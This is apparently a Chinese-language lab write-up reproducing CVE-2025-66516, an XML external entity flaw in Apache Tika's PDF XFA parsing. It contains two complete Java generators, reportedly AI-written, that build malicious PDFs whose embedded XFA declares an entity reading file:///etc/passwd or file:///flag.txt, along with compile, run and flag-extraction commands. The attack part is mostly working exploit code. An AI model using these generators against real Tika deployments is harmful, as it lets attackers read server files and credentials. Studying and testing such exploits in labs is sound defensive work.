https://blog.csdn.net/AKM4180/article/details/155860707
https://github.com/Kai-One001/cve-/blob/main/CVE-2025-66516-xfa-passwd.pdf
复现验证
1、连上靶机后上传从github下载好的文件进行漏洞验证。

由于使用公众号中的 PoC 无法生成我所需要的恶意 PDF(本人太菜),所以结合得到的源代码,让 AI 帮我重新写了一份 PoC,具体步骤如下。
# Dump printable strings from the reference PDF and show the DTD entity
# declaration(s) with five lines of context on each side.
strings CVE-2025-66516-xfa-passwd.pdf | grep -A 5 -B 5 '<!ENTITY'

根据你提供的 PDF 片段(包含 <!ENTITY xxe SYSTEM "file:///etc/passwd"> 和 XFA 结构),以下是完全复现该 payload 的独立 Java PoC 代码,可生成一模一样的 CVE-2025-66516-xfa-passwd.pdf 文件。
import org.apache.pdfbox.cos.COSDictionary;
import org.apache.pdfbox.cos.COSName;
import org.apache.pdfbox.cos.COSStream;
import org.apache.pdfbox.pdmodel.PDDocument;
import org.apache.pdfbox.pdmodel.PDPage;
import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;
import java.io.OutputStream;
import java.io.IOException;
/**
 * Builds a PDF whose AcroForm carries an XFA stream that declares an external
 * XML entity ({@code file:///etc/passwd}) and references it from the datasets
 * section. The page presents it as a reproduction of the CVE-2025-66516 test
 * file: a consumer that parses the embedded XFA XML with DTD processing and
 * external entity resolution enabled substitutes the file contents into the
 * field value, which is the XXE behaviour the test case checks for. On the
 * parsing side the mitigation is to disallow DOCTYPE declarations and external
 * entity resolution when handling XFA taken from untrusted PDFs.
 */
public class CVE_2025_66516_XXE {
    /**
     * Writes {@code CVE-2025-66516-xfa-passwd.pdf} into the working directory.
     *
     * @param args unused
     * @throws IOException if PDFBox fails to build or save the document
     */
    public static void main(String[] args) throws IOException {
        PDDocument doc = new PDDocument();
        PDPage page = new PDPage();
        doc.addPage(page);
        // Create the AcroForm that will own the /XFA entry.
        PDAcroForm acroForm = new PDAcroForm(doc);
        // NOTE(review): presumably carried over from the reference PDF; the
        // entity reference below does not depend on this flag — confirm.
        acroForm.setNeedAppearances(true);
        doc.getDocumentCatalog().setAcroForm(acroForm);
        // XFA payload matching the reference PDF: a DOCTYPE that declares the
        // external general entity "xxe", followed by a datasets block that
        // references &xxe; so an entity-resolving parser expands it into the
        // field value.
        String xfaXml =
            "<!DOCTYPE xfa [\n" +
            " <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n" +
            "]>\n" +
            "<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n" +
            " <xdp:template>\n" +
            " <template xmlns=\"http://www.xfa.org/schema/xfa-template/2.8/\">\n" +
            " <subform name=\"form1\"><field name=\"field\"/></subform>\n" +
            " </template>\n" +
            " </xdp:template>\n" +
            " <xdp:datasets>\n" +
            " <xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\n" +
            " <xfa:data><root><field>&xxe;</field></root></xfa:data>\n" +
            " </xfa:datasets>\n" +
            " </xdp:datasets>\n" +
            "</xdp:xdp>";
        // Store the XML in a fresh COSStream (no filter is set here, so the
        // bytes presumably land in the file as-is — verify against the output).
        COSStream xfaStream = doc.getDocument().createCOSStream();
        try (OutputStream os = xfaStream.createOutputStream()) {
            // NOTE(review): StandardCharsets.UTF_8 would avoid the checked
            // UnsupportedEncodingException that the String overload declares.
            os.write(xfaXml.getBytes("UTF-8"));
        }
        // Set /XFA on the underlying COS dictionary of the AcroForm so that
        // XFA-aware consumers reach the stream.
        COSDictionary acroFormDict = acroForm.getCOSObject();
        acroFormDict.setItem(COSName.XFA, xfaStream);
        // Save the PDF. NOTE(review): close() is not in try-with-resources,
        // so an exception from save() leaves the document open.
        String output = "CVE-2025-66516-xfa-passwd.pdf";
        doc.save(output);
        doc.close();
        System.out.println("[+] Generated: " + output);
    }
}
# Compile and run the generator; the three JARs must be in the current
# directory (the download commands appear later on the page).
javac -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." CVE_2025_66516_XXE.java
java -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." CVE_2025_66516_XXE
因为靶场已经明确 flag 文件在根目录下,所以把实体指向的路径改为 /flag.txt,具体代码如下。
import org.apache.pdfbox.cos.COSDictionary;
import org.apache.pdfbox.cos.COSName;
import org.apache.pdfbox.cos.COSStream;
import org.apache.pdfbox.pdmodel.PDDocument;
import org.apache.pdfbox.pdmodel.PDPage;
import org.apache.pdfbox.pdmodel.interactive.form.PDAcroForm;
import java.io.OutputStream;
import java.io.IOException;
/**
 * Variant of the generator above: the same XFA structure, with the external
 * entity pointing at {@code file:///flag.txt} instead of {@code /etc/passwd}.
 * Everything after the save call is console output only; the PDF itself is
 * identical in structure to the reference test file. A parser that processes
 * the XFA DTD with external entities enabled substitutes the file contents into
 * the field value; disabling DOCTYPE/external entity resolution for untrusted
 * XFA is the defensive fix.
 */
public class Tika_XXE_Exploit {
    /**
     * Writes {@code tika-xxe-exploit.pdf} into the working directory and prints
     * usage notes.
     *
     * @param args unused
     * @throws IOException if PDFBox fails to build or save the document
     */
    public static void main(String[] args) throws IOException {
        PDDocument doc = new PDDocument();
        PDPage page = new PDPage();
        doc.addPage(page);
        // Create the AcroForm that will own the /XFA entry.
        PDAcroForm acroForm = new PDAcroForm(doc);
        // NOTE(review): presumably carried over from the reference PDF; the
        // entity reference below does not depend on this flag — confirm.
        acroForm.setNeedAppearances(true);
        doc.getDocumentCatalog().setAcroForm(acroForm);
        // XFA payload; the only change from the /etc/passwd version is the
        // entity's SYSTEM path, which now points at /flag.txt (the location the
        // page says the challenge flag lives at).
        String xfaXml =
            "<!DOCTYPE xfa [\n" +
            " <!ENTITY xxe SYSTEM \"file:///flag.txt\">\n" + // points at /flag.txt
            "]>\n" +
            "<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n" +
            " <xdp:template>\n" +
            " <template xmlns=\"http://www.xfa.org/schema/xfa-template/2.8/\">\n" +
            " <subform name=\"form1\"><field name=\"field\"/></subform>\n" +
            " </template>\n" +
            " </xdp:template>\n" +
            " <xdp:datasets>\n" +
            " <xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\n" +
            " <xfa:data><root><field>&xxe;</field></root></xfa:data>\n" +
            " </xfa:datasets>\n" +
            " </xdp:datasets>\n" +
            "</xdp:xdp>";
        // Store the XML in a fresh COSStream (no filter is set here, so the
        // bytes presumably land in the file as-is — verify against the output).
        COSStream xfaStream = doc.getDocument().createCOSStream();
        try (OutputStream os = xfaStream.createOutputStream()) {
            // NOTE(review): StandardCharsets.UTF_8 would avoid the checked
            // UnsupportedEncodingException that the String overload declares.
            os.write(xfaXml.getBytes("UTF-8"));
        }
        // Set /XFA on the underlying COS dictionary of the AcroForm so that
        // XFA-aware consumers reach the stream.
        COSDictionary acroFormDict = acroForm.getCOSObject();
        acroFormDict.setItem(COSName.XFA, xfaStream);
        // Save the PDF. NOTE(review): close() is not in try-with-resources,
        // so an exception from save() leaves the document open.
        String output = "tika-xxe-exploit.pdf";
        doc.save(output);
        doc.close();
        // Console banner; nothing below affects the generated file.
        System.out.println("\n" + "=".repeat(60));
        System.out.println("[+] APACHE TIKA XXE EXPLOIT GENERATED: " + output);
        System.out.println("[!] VULNERABILITY: CVE-2025-66516");
        System.out.println("[!] TARGET: " + output + " → file:///flag.txt");
        System.out.println("[!] UPLOAD INSTRUCTIONS:");
        System.out.println("1. Upload " + output + " to the Apache Tika service");
        System.out.println("2. DOWNLOAD THE RESPONSE (processed PDF)");
        System.out.println("3. Extract flag with:");
        System.out.println(" strings response.pdf | grep -a 'CTF{'");
        System.out.println("=".repeat(60) + "\n");
        // NOTE(review): the explanations printed below are the generator's own
        // commentary (AI-written per the page) and are not verified by this
        // code; treat them as claims, not as established behaviour of Tika.
        System.out.println("[!] WHY THIS WORKS FOR CVE-2025-66516:");
        System.out.println("- Uses minimal XFA structure proven to work with Tika's PDF parser");
        System.out.println("- Targets EXACT flag location specified in challenge (/flag.txt)");
        System.out.println("- Avoids entity nesting that breaks in Tika's XML parser");
        System.out.println("- Matches the structure that successfully read /etc/passwd");
    }
}
# Save the listing above as Tika_XXE_Exploit.java, then compile and run it
# against PDFBox 2.0.29 (the JARs must already be in the current directory).
javac -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." Tika_XXE_Exploit.java
java -cp "pdfbox-2.0.29.jar:fontbox-2.0.29.jar:commons-logging-1.2.jar:." Tika_XXE_Exploit
# Required JARs — fetch these before the javac step above.
wget https://repo1.maven.org/maven2/org/apache/pdfbox/pdfbox/2.0.29/pdfbox-2.0.29.jar
wget https://repo1.maven.org/maven2/org/apache/pdfbox/fontbox/2.0.29/fontbox-2.0.29.jar
wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
最终上传生成的 PDF 文件,获得 flag.txt 的内容。





